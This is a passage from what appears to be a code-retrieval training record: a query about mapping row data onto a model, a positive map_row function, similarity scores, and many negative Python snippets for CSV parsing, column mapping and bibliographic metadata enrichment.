enumerate(CurrentBoolVec) if x]\n replaceList['changeNum'].iloc[index]=len(replaceList['changeIndexes'].iloc[index])\n inputColumn=inputColumn.replace(regex=True, to_replace=currentRegexExpression,value=row[1])\n return inputColumn, replaceList;", "def transform(self, record):\n if not record:\n return None\n\n # If we've got a list, hope it's a list of records. Recurse,\n # calling transform() on each of the list elements in order and\n # return the resulting list.\n if type(record) is list:\n results = []\n for single_record in record:\n results.append(self.transform(single_record))\n return results\n\n # Apply all patterns in order\n result = record\n for old_str, new_str in self.patterns.items():\n result = re.sub(old_str, new_str, result, self.count, self.flags)\n return result", "def _process_text_line(self, line, columns, format, lower_case, num_line,\n fill_missing=0, filter_case=None,\n strict_separator=False):\n if not isinstance(line, list) and not isinstance(\n line, tuple) and not isinstance(line, numpy.ndarray):\n if format != \"tsv\":\n raise Exception(\"unable to process format \" + format)\n line = line.strip(\"\\r\\n \").replace(\"\\n\", \" \")\n line = DatabaseCore2._split_expr.split(line)\n\n if filter_case is not None:\n line = [filter_case(s) for s in line]\n\n try:\n if fill_missing > 0:\n m = max(columns.keys())\n if m >= len(line):\n line = copy.copy(line)\n add = 0\n while m >= len(line) and add < fill_missing:\n a, b = columns[len(line)]\n if b is int:\n line.append(\"0\")\n elif b is float:\n line.append(\"0.0\")\n elif b is decimal.Decimal:\n line.append(\"0\")\n elif b is str:\n line.append(\"\")\n else:\n line.append(\"\")\n add += 1\n\n res = {}\n for c, v in columns.items():\n if \"AUTOFILL\" in v:\n res[v[0]] = \"NULL\"\n elif \"AUTOINCREMENT\" in v:\n continue\n else:\n if c >= len(line):\n self.LOG(\n \"(a)line number \",\n num_line,\n \"*unable to process a line columns \",\n c,\n \"#\",\n line,\n \" columns \",\n columns)\n return None\n\n val = line[c]\n if len(v) > 2 and v[2].lower() not in [\n \"primarykey\", \"autofill\"]:\n val = v[2](val)\n\n try:\n if isinstance(v[1], tuple):\n val = v[1][0](val)\n elif v[1] is datetime.datetime:\n if isinstance(val, datetime.datetime):\n pass\n elif isinstance(val, str):\n val = datetime.datetime.parse(val)\n else:\n raise TypeError(\n \"unable to convert %s into datetime\" % str(\n type(val)))\n else:\n val = v[1](val)\n except ValueError: # as e :\n self.LOG(\n \"(b)line number \",\n num_line,\n \"**unable to process a line columns \",\n c,\n \"#\",\n v[0],\n \" type \",\n v[1],\n \" value \",\n repr(\n line[c]))\n return None\n\n if isinstance(val, str):\n val = val.replace(\"'\", \"''\")\n if lower_case:\n val = val.lower()\n res[v[0]] = val\n\n return res\n except Exception:\n self.LOG(\"(c)line number\", num_line,\n \"***unable to process a line columns:\", line)\n return None", "def clean_types(data: Iterable[dict]) -> List[dict]:\n data_copy = []\n for row in data:\n row_copy = {}\n for col, val in row.items():\n if type(val) == date:\n row_copy[col] = datetime.combine(val, time())\n elif type(val) == list:\n if not val:\n row_copy[col] = None\n else:\n row_copy[col] = ','.join(str(el) if el is not None else 'NULL' for el in val)\n elif type(val) == dict:\n row_copy[col] = str(val)\n else:\n row_copy[col] = val\n\n data_copy.append(row_copy)\n\n return data_copy", "def replace_invalid_values(row):\n invalid_values = [math.inf, -math.inf, math.nan]\n return [x if x not in invalid_values else None for x in row]", "def convert_series_to_proto_values(row: pd.Series):\n\n feature_row = FeatureRowProto.FeatureRow(\n event_timestamp=_pd_datetime_to_timestamp_proto(\n dataframe[DATETIME_COLUMN].dtype, row[DATETIME_COLUMN]\n ),\n feature_set=feature_set.project + \"/\" + feature_set.name,\n )\n\n for field_name, field in feature_set.fields.items():\n feature_row.fields.extend(\n [\n FieldProto.Field(\n name=field.name,\n value=_python_value_to_proto_value(\n field.dtype, row[field.name]\n ),\n )\n ]\n )\n return feature_row", "def split_records(data, delimiter=r\"\\r\\n\"):\n # https://stackoverflow.com/a/2787979\n return re.split(delimiter + \"\"\"(?=(?:[^'\"]|'[^']*'|\"[^\"]*\")*$)\"\"\", data)", "def change_date(csv_list_of_rows, time_column_name, date_format, seconds_forward):\n time_column_indices = find_item_positions(csv_list_of_rows, time_column_name, 0)\n if time_column_indices == []:\n sys.stderr.write('The following column of data was not found: ' + time_column_name + '\\n')\n row_count = 0\n for time_column_index in time_column_indices:\n while row_count < len(csv_list_of_rows):\n if row_count > 0:\n try:\n if '�' not in csv_list_of_rows[row_count][time_column_index]:\n csv_date = datetime.datetime.strptime(csv_list_of_rows[row_count][time_column_index], date_format)\n eastern_time = csv_date + datetime.timedelta(seconds = seconds_forward)\n csv_list_of_rows[row_count][time_column_index] = eastern_time.strftime(date_format)\n else:\n sys.stderr.write('The URC turned a date field for row ' + str(row_count) + ' into something unparseable: ' + str(csv_list_of_rows[row_count][time_column_index]) + ' so we are dropping the row\\n')\n del csv_list_of_rows[row_count]\n row_count -= 1\n except Exception as ex:\n sys.stderr.write('Row ' + str(row_count) + ' causes an exception so we will leave this date alone: ' + str(ex) + '\\n')\n row_count += 1\n return csv_list_of_rows", "def blob_to_list(blob):\r\n splits = blob.split(blob_delimiter)\r\n items = []\r\n for item in splits:\r\n items.append(item.replace(blob_delimiter_replacement, blob_delimiter))\r\n return items" ]
[ "0.6390672", "0.61461806", "0.61275697", "0.6075597", "0.6021947", "0.60119367", "0.5930786", "0.5849591", "0.5666509", "0.56609106", "0.562658", "0.56255656", "0.5619078", "0.5576439", "0.55647933", "0.55612415", "0.5549309", "0.5546282", "0.5542975", "0.5528512", "0.55209035", "0.550323", "0.5479354", "0.5450724", "0.5448862", "0.5436596", "0.5429882", "0.54264444", "0.5417858", "0.53455025", "0.52947044", "0.5292469", "0.5284172", "0.5244553", "0.5236786", "0.5225136", "0.52204067", "0.5219918", "0.51894134", "0.51666695", "0.51593035", "0.5153406", "0.5138278", "0.5135327", "0.51325226", "0.50971746", "0.50841427", "0.50603807", "0.505741", "0.50458294", "0.5039518", "0.5029", "0.5010358", "0.5007231", "0.49989843", "0.49963996", "0.4973466", "0.4961982", "0.4959455", "0.49575475", "0.49561194", "0.49554053", "0.4947146", "0.49459028", "0.4939512", "0.49280885", "0.4924494", "0.49097586", "0.49072403", "0.49041232", "0.49034575", "0.4887407", "0.48824015", "0.4882009", "0.48670644", "0.4866655", "0.48591813", "0.48566964", "0.4847282", "0.48455232", "0.48453012", "0.48425043", "0.48256743", "0.48256743", "0.480151", "0.4779804", "0.47730914", "0.47715878", "0.476952", "0.47670934", "0.47621694", "0.47621423", "0.47611964", "0.4759662", "0.47557193", "0.47535652", "0.4751245", "0.47392604", "0.4738453", "0.4738412" ]
0.63998896
0
Apply mapping of row data to model.
def map_row(row, mapping, model_class, extra_data_fields=[], cleaner=None, **kwargs): initial_data = kwargs.get('initial_data', None) model = model_class() # _log.debug("map_row's mappings {}".format(mapping)) # If there are any initial states we need to set prior to mapping. if initial_data: model = apply_initial_data(model, initial_data) # concat is not used as of 2016-09-14 # concat = _set_default_concat_config(concat) for raw_field, value in row.items(): is_extra_data = True if raw_field in extra_data_fields else False # Save the value if is is not None, keep empty fields. if value is not None: model = apply_column_value(raw_field, value, model, mapping, is_extra_data, cleaner) return model
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def applyMapping(self):\n pass", "def map(self, function=lambda item: item):\n for i, row in enumerate(self):\n for j, item in enumerate(row):\n row[j] = function(item)", "def map_transfer_to_row(self, transfer):\n pass", "def _do_mapping(self):\n pass", "def Map(dataset, map_func, input_columns=None):\n return dataset.map(map_func)", "def extract_mapping(self) -> DatasetMapping:\n # store fields\n fields = []\n for col in self.data.columns:\n #get field label\n label = col\n #get field type using PANDAS_TYPE (see apps.utils.utils)\n col_type = self.data[col].dtype\n field_type = PANDAS_TYPE[col_type]\n #set field\n field = FieldMapping(label=label, type=field_type)\n fields.append(field)\n self.mapping.append(label)\n return DatasetMapping(fields=fields)", "def mapfn(k, v):\n for row in v:\n # completar\n pass", "def places_process_rows(self):\n\n for index in range(len(self.table)):\n row_rdf = self.places_map_row_to_rdf(self.table.iloc[index])\n if row_rdf is not None:\n self.data += row_rdf", "def map_items(self) -> None:\n self.__attribute_columns = list(self.__DataFrame.columns)\n self.__attribute_columns.remove(self.__surv_col_name)\n self.__attribute_columns.remove(self.__status_col_name)\n\n mapped_int = 0\n\n for attribute in self.__attribute_columns:\n for value in self.__DataFrame[attribute].unique():\n item_reference = (attribute, value)\n self.__item_map[item_reference] = mapped_int\n self.items_list.append(item_reference)\n mapped_int += 1", "def mapRow(this_row, header_dict, precursors_mapping, sequences_mapping, protein_mapping):\n\n if \"FullPeptideName\" in header_dict:\n\n peptide_name = this_row[header_dict[\"FullPeptideName\"]]\n\n transitions = []\n pr_transitions = []\n if \"aggr_Fragment_Annotation\" in header_dict:\n transitions = this_row[ header_dict[\"aggr_Fragment_Annotation\"] ].split(\";\")\n if \"aggr_prec_Fragment_Annotation\" in header_dict:\n pr_transitions = this_row[ header_dict[\"aggr_prec_Fragment_Annotation\"] ].split(\";\")\n\n # Skip row if there are no transitions\n if len(transitions) == 0:\n return\n\n if len(transitions[-1]) == 0:\n transitions = transitions[:-1]\n if len(pr_transitions) > 0 and len(pr_transitions[-1]) == 0:\n pr_transitions = pr_transitions[:-1]\n\n # Get charge state (may be absent)\n charge_state = \"0\"\n if \"Charge\" in header_dict:\n charge_state = this_row[header_dict[\"Charge\"]]\n\n if charge_state == \"NA\" or charge_state == \"\":\n charge_state = \"0\"\n\n key = peptide_name + \"/\" + charge_state\n prkey = peptide_name + \"/\" + charge_state + \"_pr\"\n precursors_mapping [ key ] = transitions\n precursors_mapping [ prkey ] = pr_transitions\n mapped_precursors = sequences_mapping.get( peptide_name, [] )\n mapped_precursors.extend([key, prkey])\n sequences_mapping[peptide_name] = mapped_precursors # = [ key, prkey ]\n\n if \"ProteinName\" in header_dict:\n protein_name = this_row[header_dict[\"ProteinName\"]]\n\n tmp = protein_mapping.get(protein_name, [])\n if peptide_name not in tmp:\n tmp.append(peptide_name)\n protein_mapping[protein_name] = tmp", "def process_row(row, row_num, column_map, num_required_columns, additional_isbn_columns,\n doab_analysis, doaj_analysis, no_crossref_lookup=False, no_pubmed_lookup=False,\n no_doaj_lookup=False, no_title_lookup=False, round_monetary=False,\n offsetting_mode=None, orig_file_path=None, crossref_max_retries=3):\n if len(row) != num_required_columns:\n msg = \"Line %s: \" + MESSAGES[\"num_columns\"]\n logging.error(msg, row_num, len(row), num_required_columns)\n return row\n\n empty_row = True\n for elem in row:\n if has_value(elem):\n empty_row = False\n break\n else:\n msg = \"Line %s: \" + MESSAGES[\"empty_row\"]\n logging.warning(msg, row_num)\n\n current_row = {}\n record_type = None\n\n # Copy content of identified columns and apply special processing rules\n for csv_column in column_map.values():\n index, column_type = csv_column.index, csv_column.column_type\n if empty_row:\n current_row[column_type] = \"\"\n continue\n if column_type == \"euro\" and index is not None:\n current_row[\"euro\"] = _process_euro_value(row[index], round_monetary, row_num, index, offsetting_mode)\n elif column_type == \"period\" and index is not None:\n current_row[\"period\"] = _process_period_value(row[index], row_num)\n elif column_type == \"is_hybrid\" and index is not None:\n current_row[\"is_hybrid\"] = _process_hybrid_status(row[index], row_num)\n elif column_type == \"institution\" and index is not None:\n current_row[\"institution\"] = _process_institution_value(row[index], row_num, orig_file_path, offsetting_mode)\n else:\n if index is not None and len(row[index]) > 0:\n current_row[column_type] = row[index]\n else:\n current_row[column_type] = \"NA\"\n\n doi = current_row[\"doi\"]\n if not has_value(doi) and not empty_row:\n msg = (\"Line %s: No DOI found\")\n logging.info(msg, row_num)\n current_row[\"indexed_in_crossref\"] = \"FALSE\"\n # lookup ISBNs in crossref\n additional_isbns = [row[i] for i in additional_isbn_columns]\n found_doi, r_type = _isbn_lookup(current_row, row_num, additional_isbns, doab_analysis.isbn_handling)\n if r_type is not None:\n record_type = r_type\n if found_doi is not None:\n # integrate DOI into row and restart\n logging.info(\"New DOI integrated, restarting enrichment for current line.\")\n index = column_map[\"doi\"].index\n row[index] = found_doi\n return process_row(row, row_num, column_map, num_required_columns, additional_isbn_columns,\n doab_analysis, doaj_analysis, no_crossref_lookup, no_pubmed_lookup,\n no_doaj_lookup, no_title_lookup, round_monetary, offsetting_mode, orig_file_path)\n # lookup the book title in Crossref\n lookup_title = current_row[\"book_title\"]\n if has_value(lookup_title):\n msg = (\"Line %s: Trying to look up the book title ('%s') in Crossref...\")\n logging.info(msg, row_num, lookup_title)\n book_doi = title_lookup(lookup_title, [\"book\", \"monograph\", \"reference-book\"])\n if book_doi:\n logging.info(\"New DOI integrated, restarting enrichment for current line.\")\n index = column_map[\"doi\"].index\n row[index] = book_doi\n return process_row(row, row_num, column_map, num_required_columns, additional_isbn_columns,\n doab_analysis, doaj_analysis, no_crossref_lookup, no_pubmed_lookup,\n no_doaj_lookup, no_title_lookup, round_monetary, offsetting_mode, orig_file_path)\n if has_value(doi):\n # Normalise DOI\n norm_doi = get_normalised_DOI(doi)\n if norm_doi is not None and norm_doi != doi:\n current_row[\"doi\"] = norm_doi\n msg = MESSAGES[\"doi_norm\"].format(doi, norm_doi)\n logging.info(msg)\n doi = norm_doi\n # include crossref metadata\n if not no_crossref_lookup:\n crossref_result = get_metadata_from_crossref(doi)\n retries = 0\n while not crossref_result[\"success\"] and crossref_result[\"error_msg\"].startswith(\"HTTPError: 504\"):\n if retries >= crossref_max_retries:\n break\n # retry on gateway timeouts, crossref API is quite busy sometimes\n msg = \"%s, retrying...\"\n logging.warning(msg, crossref_result[\"error_msg\"])\n retries += 1\n crossref_result = get_metadata_from_crossref(doi)\n if not crossref_result[\"success\"]:\n exc = crossref_result[\"exception\"]\n # check if a preprint lookup is possible\n if not no_title_lookup and type(exc) == UnsupportedDoiTypeError and exc.doi_type == \"posted-content\":\n msg = (\"Line %s: Found a DOI with type 'posted_content' (%s). This might \" +\n \"be a case of a preprint DOI, trying to find the final version of the article...\")\n logging.info(msg, row_num, doi)\n if not exc.crossref_title:\n msg = \"Line %s: Preprint lookup failed, no title could be extracted.\"\n logging.warning(msg, row_num)\n else:\n article_doi = title_lookup(exc.crossref_title, [\"journal-article\"])\n if article_doi:\n logging.info(\"New DOI integrated, restarting enrichment for current line...\")\n index = column_map[\"doi\"].index\n row[index] = article_doi\n return process_row(row, row_num, column_map, num_required_columns, additional_isbn_columns,\n doab_analysis, doaj_analysis, no_crossref_lookup, no_pubmed_lookup,\n no_doaj_lookup, no_title_lookup, round_monetary, offsetting_mode, orig_file_path)\n if crossref_result[\"success\"]:\n data = crossref_result[\"data\"]\n record_type = data.pop(\"doi_type\")\n logging.info(\"Crossref: DOI resolved: \" + doi + \" [\" + record_type + \"]\")\n current_row[\"indexed_in_crossref\"] = \"TRUE\"\n for key, value in data.items():\n new_value = _process_crossref_results(current_row, row_num, key, value)\n old_value = current_row[key]\n current_row[key] = column_map[key].check_overwrite(old_value, new_value)\n else:\n msg = \"Line %s: Crossref: Error while trying to resolve DOI %s: %s\"\n logging.error(msg, row_num, doi, crossref_result[\"error_msg\"])\n current_row[\"indexed_in_crossref\"] = \"FALSE\"\n # lookup ISBNs in crossref and try to find a correct DOI\n additional_isbns = [row[i] for i in additional_isbn_columns]\n found_doi, r_type = _isbn_lookup(current_row, row_num, additional_isbns, doab_analysis.isbn_handling)\n if r_type is not None:\n record_type = r_type\n if found_doi is not None:\n # integrate DOI into row and restart\n logging.info(\"New DOI integrated, restarting enrichment for current line.\")\n index = column_map[\"doi\"].index\n row[index] = found_doi\n return process_row(row, row_num, column_map, num_required_columns, additional_isbn_columns,\n doab_analysis, doaj_analysis, no_crossref_lookup, no_pubmed_lookup,\n no_doaj_lookup, no_title_lookup, round_monetary, offsetting_mode, orig_file_path)\n # include pubmed metadata\n if not no_pubmed_lookup and record_type == \"journal-article\":\n pubmed_result = get_metadata_from_pubmed(doi)\n if pubmed_result[\"success\"]:\n logging.info(\"Pubmed: DOI resolved: \" + doi)\n data = pubmed_result[\"data\"]\n for key, value in data.items():\n if value is not None:\n new_value = value\n else:\n new_value = \"NA\"\n msg = \"WARNING: Element %s not found in in response for doi %s.\"\n logging.debug(msg, key, doi)\n old_value = current_row[key]\n current_row[key] = column_map[key].check_overwrite(old_value, new_value)\n else:\n msg = \"Line %s: Pubmed: Error while trying to resolve DOI %s: %s\"\n logging.error(msg, row_num, doi, pubmed_result[\"error_msg\"])\n\n # lookup in DOAJ. try the EISSN first, then ISSN and finally print ISSN\n if not no_doaj_lookup and not empty_row:\n issns = []\n new_value = \"NA\"\n if current_row[\"issn_electronic\"] != \"NA\":\n issns.append(current_row[\"issn_electronic\"])\n if current_row[\"issn\"] != \"NA\":\n issns.append(current_row[\"issn\"])\n if current_row[\"issn_print\"] != \"NA\":\n issns.append(current_row[\"issn_print\"])\n for issn in issns:\n lookup_result = doaj_analysis.lookup(issn)\n if lookup_result:\n msg = \"DOAJ: Journal ISSN (%s) found in DOAJ offline copy ('%s').\"\n logging.info(msg, issn, lookup_result)\n new_value = \"TRUE\"\n break\n else:\n msg = \"DOAJ: Journal ISSN (%s) not found in DOAJ offline copy.\"\n new_value = \"FALSE\"\n logging.info(msg, issn)\n old_value = current_row[\"doaj\"]\n current_row[\"doaj\"] = column_map[\"doaj\"].check_overwrite(old_value, new_value)\n if record_type != \"journal-article\" and not empty_row:\n collected_isbns = []\n for isbn_field in [\"isbn\", \"isbn_print\", \"isbn_electronic\"]:\n # test and split all ISBNs\n current_row[isbn_field] = _process_isbn(row_num, current_row[isbn_field], doab_analysis.isbn_handling)\n if has_value(current_row[isbn_field]):\n collected_isbns.append(current_row[isbn_field])\n additional_isbns = [row[i] for i in additional_isbn_columns]\n for isbn in additional_isbns:\n result = _process_isbn(row_num, isbn, doab_analysis.isbn_handling)\n if has_value(result):\n collected_isbns.append(result)\n if len(collected_isbns) == 0:\n logging.info(\"No ISBN found, skipping DOAB lookup.\")\n current_row[\"doab\"] = \"NA\"\n else:\n record_type = \"book\"\n logging.info(\"Trying a DOAB lookup with the following values: \" + str(collected_isbns))\n for isbn in collected_isbns:\n doab_result = doab_analysis.lookup(isbn)\n if doab_result is not None:\n current_row[\"doab\"] = \"TRUE\"\n msg = 'DOAB: ISBN %s found in normalized DOAB (%s, \"%s\")'\n logging.info(msg, isbn, doab_result[\"publisher\"], doab_result[\"book_title\"])\n if current_row[\"indexed_in_crossref\"] == \"TRUE\":\n msg = \"Book already found in Crossref via DOI, those results take precedence\"\n logging.info(msg)\n else:\n for key in doab_result:\n current_row[key] = doab_result[key]\n if not has_value(current_row[\"isbn\"]):\n current_row[\"isbn\"] = isbn\n break\n else:\n current_row[\"doab\"] = \"FALSE\"\n msg = \"DOAB: None of the ISBNs found in DOAB\"\n logging.info(msg)\n if offsetting_mode:\n current_row[\"agreement\"] = offsetting_mode\n record_type = \"journal-article_transagree\"\n\n if record_type is None:\n msg = \"Line %s: Could not identify record type, using default schema 'journal-article'\"\n logging.warning(msg, row_num)\n record_type = \"journal-article\"\n\n result = []\n for field in COLUMN_SCHEMAS[record_type]:\n result.append(current_row[field])\n\n return (record_type, result)", "def _transform_map_data(self):\n WARD_FMT = '%s-%s'\n self.map_data_trans = []\n lookup = {i.column: ''.join(filter(lambda x: x.isdigit(), i.value)) for i in self.sht[1]}\n\n #skip over header\n rs = iter(self.sht.rows)\n next(rs)\n next(rs)\n for r in rs:\n pka = r[0].value\n for c in r[1:]:\n if c.value is None:\n c.value = 0\n\n self.map_data_trans.append((WARD_FMT%(pka, lookup[c.column]), c.value))", "def applymap(self, func, *args, **kwargs):\n return DataFrameDefault.register(pandas.DataFrame.applymap)(\n self, func, *args, **kwargs\n )", "def iter_rows_raw(self, *args):\n\n for row in super().iter_rows_raw(*args):\n row[0] = row[1] # sequential catalog index not right in this case; overwrite to match finder id\n yield row", "def _map(self, p_input:Element, p_output:Element):\r\n \r\n self._sl_model.eval()\r\n\r\n # Input pre processing\r\n input = self.input_preproc(p_input)\r\n\r\n # Make prediction\r\n output = self.forward(input)\r\n\r\n # Output post processing\r\n output = self.output_postproc(output)\r\n\r\n # Set list to Element\r\n p_output.set_values(output)", "def mapfn(k, v):\n for row in v:\n # rellenar el codigo\n pass", "def prepopulate(self, model, exclude=[]):\n for col in model.columns():\n if col not in exclude and hasattr(self, col):\n setattr(getattr(self, col), 'data', getattr(model, col))", "def mutate_row(self, row_key: bytes, column_family_id: str, val_dict: dict,\n time_stamp: Optional[datetime.datetime] = None\n ) -> bigtable.row.Row:\n row = self.table.row(row_key)\n\n for column, value in val_dict.items():\n row.set_cell(column_family_id=column_family_id, column=column,\n value=value, timestamp=time_stamp)\n return row", "def map(self,Affine,i):\n map_x = np.zeros([self.num,self.d])\n for k in range(self.num):\n map_x[k,:] = Affine.apply(i,self.pick(k))\n Mapped = Model_Points(map_x)\n return Mapped", "def map (a_data,a_column,a_old,a_new) :\n loc_new_data = a_data\n a_data[a_column].replace(a_old,a_new,inplace=True)", "def create_row_processor(self, context, path, reduced_path, mapper, \n row, adapter):\n\n return None, None, None", "def mapper(record):\n matrix, row, col, value = record\n if matrix == A_MATRIX:\n # For all A(i,j) emit key (j, k) for k=1 to number of columns in B\n for k in range(0, B_COLS):\n mr.emit_intermediate((row, k), [matrix, col, value])\n else:\n # For all B(j, k) emit key (j, i) for i=1 to number of rows in B\n for i in range(0, A_ROWS):\n mr.emit_intermediate((i, col), [matrix, row, value])", "def create_row_processor(self, context, path, reduced_path, \n mapper, row, adapter):\n return None, None, None", "def map(self, obj):\n if isinstance(obj, np.ndarray) and obj.ndim >= 2 and obj.shape[0] in (2,3):\n return fn.transformCoordinates(self, obj)\n else:\n return QtGui.QMatrix4x4.map(self, obj)", "def get_model(self, payload):\n return super(BulkEntryTransformer, self).to_model(payload)", "def map_data(self, obj: object):\n pass", "def update(self, data: dict):\n for key in data:\n model_att = getattr(self.__class__, key, None)\n value = data.get(key)\n\n setattr(self, key, type(model_att.type.python_type())(value))\n\n self.commit()\n return self", "def apply_fn(self,fn):\r\n \r\n self.check_Data()\r\n for split,data_ in self.processed_data.items():\r\n x = data_['x']\r\n x = np.array([fn(xi) for xi in x])\r\n data_['x'] = x", "def _add_from_dict(self, row) :\n\n data = [row.get(col, None) for col in self.cols]\n self._insert_internal(self.cols, data)", "def apply_remap(self):\n\n if not has_remap():\n return self\n\n newdata = self.copy()\n newdata._partial_remap()\n return newdata", "def map(self):\n self.api_setup()\n for data in self._csv_data:\n mapped_data = dict()\n for key, value in data.items():\n mapped_data[CSV_MAPPING[key]] = str(value)\n self._api_data.append(mapped_data)\n\n self.csv_category_to_api()\n self.csv_attributes_to_api()\n self.csv_dimensions_to_api()\n self.csv_images_to_api()", "def get_map_for_model(self, model):\n return super().__getitem__(model)", "def map(self):\n map_rupture(self)", "def _MapValues(geol, arr):\n # TODO: check that geol table contains all indexs found in arr\n # Return the mapped table\n geol.set_index(geol.keys()[0])\n return geol[geol.keys()[1::]].iloc[arr]", "def update(self, mapping):\n if not ismapping(mapping):\n raise TypeError(\"mapping type required\")\n field_names = getpyattr(type(self), 'field_names')\n for key, value in mapping.items():\n if key in field_names:\n setattr(self, key, value)", "def place_types_process_rows(self):\n\n for index in range(len(self.table)):\n row_rdf = self.place_types_map_row_to_rdf(self.table.iloc[index])\n if row_rdf is not None:\n self.data += row_rdf", "def _set_document_attribute(self, doc, row, mapping):\n # Unpack mapping info.\n try:\n attr, col_idx, convertor = mapping\n except ValueError:\n try:\n attr, col_idx = mapping\n except ValueError:\n print mapping\n raise ValueError()\n convertor = None\n\n # Convert cell value.\n if col_idx.find(\"-\") == -1:\n attr_value = self._get_cell_value(row, convert_col_idx(col_idx), convertor)\n else:\n col_idx_from, col_idx_to = [convert_col_idx(i) for i in col_idx.split(\"-\")]\n attr_value = [i for i in (self._get_cell_value(row, i, convertor)\n for i in range(col_idx_from, col_idx_to + 1)) if i]\n\n # Set aattribute value.\n setattr(doc, attr, attr_value)", "def mapped(self, *args, **kwargs): # real signature unknown\r\n pass", "def mapping(db_url, data):\n _mapping = lookup.as_mapping(db_url, map(op.itemgetter(0), data), QUERY)\n for idx, value in enumerate(_mapping.values()):\n value[\"sequence\"] = value[\"sequence\"].replace(\"U\", \"T\")\n return _mapping", "def map(self, function=lambda value: value):\n for j, value in enumerate(self):\n self[j] = function(value)", "def __init__(self, row):\n state = inspect(row)\n\n # Don't store the actual row, so we can serialize.\n self._model_cls = state.class_\n self._pk = state.identity\n\n self.data = Box(dict(row))", "def map_cols_to_attr(self):\n ## this is from the base class:\n ## for attr, label in zip(self.attr_names, self.labels):\n ## col_ind = self.col_inds[label]\n ## if len(self.data) > 0:\n ## setattr(self, attr, self.data[:,col_ind])\n #\n # hard coding based on what I know about saleae files:\n self.t = self.data[:,0]#.astype(float)\n nr, nc = self.data.shape\n self.num_cols = nc-1\n \n for i in range(0,self.num_cols):\n attr = 'ch_%i' % i\n j = i+1\n setattr(self, attr, self.data[:,j])#.astype(float))", "def to_model(self, obj):\n if obj is None:\n raise UnprocessableEntity(\"expected data in request, was empty\", what=BAD_VALUE)\n \n if not isinstance(obj, Mapping):\n raise UnprocessableEntity(\"expected data object in request\", what=BAD_VALUE)\n \n return {k: self.cols_to_model[k](v) for k, v in obj.items() if k in self.cols_to_model}", "def make_row_map(file_path, key_field, field_map=None, transforms=None, \\\n file_encoding=None):\n\n with open(file_path, encoding=file_encoding) as file:\n # preprocess transforms\n if transforms:\n _transforms = {}\n for tf_field, tf in transforms.items():\n _type = type(tf).__name__\n if _type not in ['str', 'function']:\n raise ValueError('Invalid transform')\n _transforms[tf_field] = {\n 'transform': tf,\n 'type': _type\n }\n\n # get fields from csv\n fields_reader = csv.reader(file)\n fields = next(fields_reader)\n\n # make sure we aren't missing any field names\n first_row = next(fields_reader)\n if len(fields) != len(first_row):\n raise ValueError('Header has a different number of columns than data')\n\n # apply field map\n if field_map:\n # TODO use a case insensitive dictionary for field map\n fields = [field_map.get(field.lower()) or field for field in fields]\n key_field = field_map.get(key_field) or key_field\n\n # lowercase\n fields = [field.lower() for field in fields]\n\n # handle spaces\n fields = [field.replace(' ', '_') for field in fields]\n\n # use namedtuple for rows\n fields_joined = ' '.join(fields)\n Row = namedtuple('Row', fields_joined)\n\n # make map\n row_map = {}\n reader = csv.DictReader(file, fieldnames=fields)\n\n for i, row in enumerate(reader):\n key = row[key_field]\n\n # apply transforms\n if transforms:\n for tf_field, tf_map in _transforms.items():\n tf = tf_map['transform']\n tf_type = tf_map['type']\n source_val = row[tf_field]\n if tf_type == 'str':\n val = getattr(source_val, tf)()\n else:\n val = tf(source_val)\n row[tf_field] = val\n\n # row_map[key] = row\n # str_row = {key: str(val) for key, val in row.items()}\n row_map[key] = Row(**row)\n # from pprint import pprint\n # pprint(str_row)\n # row_map[key] = Row(**str_row)\n\n return row_map", "def transform(self, data):", "def save_column_mappings(request):\n body = json.loads(request.body)\n import_file = ImportFile.objects.get(pk=body.get('import_file_id'))\n organization = import_file.import_record.super_organization\n mappings = body.get('mappings', [])\n for mapping in mappings:\n dest_field, raw_field = mapping\n if dest_field == '':\n dest_field = None\n\n dest_cols = _column_fields_to_columns(dest_field, organization)\n raw_cols = _column_fields_to_columns(raw_field, organization)\n try:\n column_mapping, created = ColumnMapping.objects.get_or_create(\n super_organization=organization,\n column_raw__in=raw_cols,\n )\n except ColumnMapping.MultipleObjectsReturned:\n # handle the special edge-case where remove dupes doesn't get\n # called by ``get_or_create``\n ColumnMapping.objects.filter(\n super_organization=organization,\n column_raw__in=raw_cols,\n ).delete()\n column_mapping, created = ColumnMapping.objects.get_or_create(\n super_organization=organization,\n column_raw__in=raw_cols,\n )\n\n # Clear out the column_raw and column mapped relationships.\n column_mapping.column_raw.clear()\n column_mapping.column_mapped.clear()\n\n # Add all that we got back from the interface back in the M2M rel.\n [column_mapping.column_raw.add(raw_col) for raw_col in raw_cols]\n if dest_cols is not None:\n [\n column_mapping.column_mapped.add(dest_col)\n for dest_col in dest_cols\n ]\n\n column_mapping.user = request.user\n column_mapping.save()\n\n return {'status': 'success'}", "def map(self, datasetType, dataId):\n\n func = getattr(self, 'map_' + datasetType)\n return func(dataId)", "def transform(self, incoming_df, **transform_params):\n outgoing_df = incoming_df.copy()\n for col in self.features:\n outgoing_df[col] = outgoing_df[col].map( self.maps[col] )\n\n return outgoing_df", "def UpdateResults(self, data, row = None):\n if not self.active:\n return\n\n if row is None:\n row = self.active_row\n\n self.SetValueRaw(row, 0, row) #set FileID\n\n #take only values from fit with match column labels\n for species, fitpars in data.iteritems():\n\n #clear fit parameter entries for species TODO: always\n #cleared, even if fitpars not valid (Note: NoFit says\n #invalid\n for rawcol in self.fitparcols[species]:\n self.SetValueRaw(row, rawcol, None)\n\n if fitpars.valid:\n for key, val in fitpars.valuedict().iteritems():\n try:\n rawcol = self.colLabels.tolist().index(key+' '+species)\n self.SetValueRaw(row, rawcol, val)\n except ValueError:\n pass\n\n self.update_dynamic_cols()\n self.update_variable_cols()\n\n #uncomment this to change row selection to the newly added row\n #self.GetView().MakeCellVisible(row, 0)\n self.GetView().Refresh()", "def _init_dict(self, data: Dict[Column, Row]):\n if not self._columns:\n self._columns = list(data.keys())\n\n # Filter values by defined columns\n columns = (\n to_list(values)\n for column, values in data.items()\n if column in self._columns\n )\n\n # Convert columns to rows\n self._data = [list(row) for row in zip_longest(*columns)]", "def process_row(row, location_map):\n\n # Add in IP columns\n ips = get_ip_extent(row[IP_PREFIX_COLUMN])\n ipv6_ips = get_ip_extent(row[IPV6_PREFIX_COLUMN])\n\n continent_code = CONTINTENT_CODES[row[CONTINENT_COLUMN]] if row[CONTINENT_COLUMN] in CONTINTENT_CODES else None\n site_id = row[SITE_COLUMN]\n\n location = location_map[site_id.lower()]\n\n # simplify\n row = {\n 'site': site_id.lower(),\n 'latitude': location['latitude'],\n 'longitude': location['longitude'],\n 'city': row[CITY_COLUMN],\n 